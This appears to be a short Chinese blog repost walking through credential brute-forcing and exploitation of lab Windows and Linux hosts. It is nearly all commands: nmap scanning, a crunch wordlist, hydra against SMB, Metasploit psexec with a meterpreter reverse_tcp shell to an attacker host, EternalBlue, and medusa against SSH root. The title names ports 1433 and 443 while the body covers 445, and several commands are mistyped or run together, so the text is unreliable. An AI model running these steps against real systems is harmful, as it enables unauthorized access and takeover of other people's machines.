1433端口爆破，443端口爆破

来源：互联网　浏览：125次　时间：2023-04-08

工具hydua、nmap
使用nmap扫描是否开启smb服务即445端口

nmap -O 172.168.172.131

发现开启，制作字典passwd.txt

crunch 1 4 1234 -o passwd .txt

hydra -l hack -P passwd.txt smb://172.168.172.131 -f -vV

密码爆破成功

启动msf

使用模块：

user exploit/windows/smb/psexec_pshset payload windows/meterpreter/reverse_tcp

show options

set rhost 172.168172.131set smb pass 123set smbuser hackset lhost 172.168.172.15

使用exploit(windows/smb/ms17_010_eternalblue)攻击win2008等都是把他们打重启，醉了。

ssh爆破

medusa -M ssh -h 172.168.172.139 -u root -P passwd.dic

所以最好别设置太简单的密码